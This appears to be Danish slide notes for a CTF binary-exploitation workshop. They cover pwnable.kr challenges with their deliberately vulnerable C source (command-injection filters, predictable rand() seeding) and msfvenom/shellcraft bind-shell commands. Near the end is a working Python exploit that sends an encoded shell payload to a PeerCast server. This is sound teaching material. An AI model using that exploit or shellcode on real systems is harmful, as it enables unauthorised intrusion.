Aftenens formål:
Formål med workshoppen:
At blive istand til at løse CTF opgaver som involverer programmer i binær form
Ingen! Vi er her for at lære. Men følgende vil hjælpe:
Note
|
Sårbarhed/vulnerability = fejl i software som har betydning for sikkerheden i softwaren. Exploit = software som udnytter en sårbarhed til at opnå et eller andet mål som ikke var tilsigtet med den sårbare software. |
På din maskine:
$ git clone https://github.com/RobertLarsen/ProsaWorkshop.git
$ cd ProsaWorkshop $ vagrant up
$ cd ProsaWorkshop $ vagrant suspend
$ cd ProsaWorkshop $ git pull $ vagrant destroy -f $ vagrant up
Enten:
$ cd ProsaWorkshop $ vagrant ssh
Eller (user=vagrant password=vagrant):
Mommy! what is PATH environment in Linux?
ssh cmd1@pwnable.kr -p2222 (pw:guest)
#include <stdio.h> #include <string.h> int filter(char* cmd){ int r=0; r += strstr(cmd, "flag")!=0; r += strstr(cmd, "sh")!=0; r += strstr(cmd, "tmp")!=0; return r; } int main(int argc, char* argv[], char** envp){ putenv("PATH=/fuckyouverymuch"); if(filter(argv[1])) return 0; system( argv[1] ); return 0; }
Daddy bought me a system command shell. but he put some filters to prevent me from playing with it without his permission… but I wanna play anytime I want!
ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)
#include <stdio.h> #include <string.h> int filter(char* cmd){ int r=0; r += strstr(cmd, "=")!=0; r += strstr(cmd, "PATH")!=0; r += strstr(cmd, "export")!=0; r += strstr(cmd, "/")!=0; r += strstr(cmd, "`")!=0; r += strstr(cmd, "flag")!=0; return r; } extern char** environ; void delete_env(){ char** p; for(p=environ; *p; p++) memset(*p, 0, strlen(*p)); } int main(int argc, char* argv[], char** envp){ delete_env(); putenv("PATH=/no_command_execution_until_you_become_a_hacker"); if(filter(argv[1])) return 0; printf("%s\n", argv[1]); system( argv[1] ); return 0; }
Hey! check out this C implementation of blackjack game! I found it online
http://cboard.cprogramming.com/c-programming/114023-simple-blackjack-program.html (http://korturl.dk/4nh)
I like to give my flags to millionares.
how much money you got?
Running at : nc pwnable.kr 9009
Alle kald til rand():
// Linje 229 srand((unsigned) time(NULL)); //Generates random seed for rand() function k=rand()%13+1; // Linje 304 srand((unsigned) time(NULL)); //Generates random seed for rand() function k=rand()%13+1; // Linje 374 srand((unsigned) time(NULL)); //Generates random seed for rand() function k=rand()%13+1; // Linje 444 srand((unsigned) time(NULL)); //Generates random seed for rand() function k=rand()%13+1; // Linje 514 srand((unsigned) time(NULL)); //Generates random seed for rand() function random_card = rand()%4+1; // Linje 639 srand((unsigned) time(NULL) + 1); //Generates random seed for rand() function z=rand()%13+1;
// Linje 721 int betting() //Asks user amount to bet { printf("\n\nEnter Bet: $"); scanf("%d", &bet); if (bet > cash) //If player tries to bet more money than player has { printf("\nYou cannot bet more money than you have."); printf("\nEnter Bet: "); scanf("%d", &bet); return bet; } else return bet; } // End Function
// Linje 28 int bet; // Linje 723 printf("\n\nEnter Bet: $"); scanf("%d", &bet); // Hvis man vinder cash = cash+bet; // Hvis man taber cash = cash - bet;
Mommy! I made a lotto program for my homework.
do you want to play?
ssh lotto@pwnable.kr -p2222 (pw:guest)
vagrant@localhost:~$ time shellcraft -f r amd64.linux.bindsh 7777 >/dev/null real 0m0.687s user 0m0.241s sys 0m0.320s vagrant@localhost:~$ time msfvenom -p linux/x64/shell_bind_tcp LPORT=7777 >/dev/null 2>&1 real 0m6.595s user 0m1.928s sys 0m4.146s
vagrant@localhost:~$ find .repositories/metasploit-framework/modules/exploits/linux -name '*.rb' | xargs wc -l | sort -nr | tail -n 1 67 .repositories/metasploit-framework/modules/exploits/linux/http/peercast_url.rb
#!/usr/bin/env python2 from pwn import * import sys #Generated with: #shellcraft i386.linux.findpeersh | msfvenom --encoder x86/shikata_ga_nai --bad-chars '\x00\x0a\x0d\x20\x2f\x3d\x3b' --arch x86 --platform linux --format python buf = "" buf += "\xbd\xf4\x6e\x99\x72\xd9\xe8\xd9\x74\x24\xf4\x5e\x2b" buf += "\xc9\xb1\x10\x83\xee\xfc\x31\x6e\x10\x03\x6e\x10\x16" buf += "\x9b\xf3\x8d\xbc\x63\x8d\x97\x1b\x32\xe7\x31\xc3\x8c" buf += "\x7a\xf1\xd7\xf0\xef\x0e\x77\x3c\x6f\x8b\xb7\xdf\x2a" buf += "\xe1\xda\xa9\x38\x63\x27\xf3\xf7\x1e\x18\x5b\xc5\x5f" buf += "\x13\xa3\xbf\x37\xb3\x7c\x6f\xe7\x30\xeb\x40\x95\xdf" buf += "\x85\x17\xba\x2e\x93\x42\x36\x08\xba\x5e\xc8" r = remote(sys.argv[1], 80) r.send('GET /stream/?' + 'A' * 780 + p32(0x080922f7) + buf + '\r\n\r\n') r.interactive()
Intro tid
Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration http://www.opensecuritytraining.info/IntroX86.html (12:08:24)
Introduction To Reverse Engineering Software http://www.opensecuritytraining.info/IntroductionToReverseEngineering.html (6:47:55)
Introduction To Software Exploits http://www.opensecuritytraining.info/Exploits1.html (9:38:54)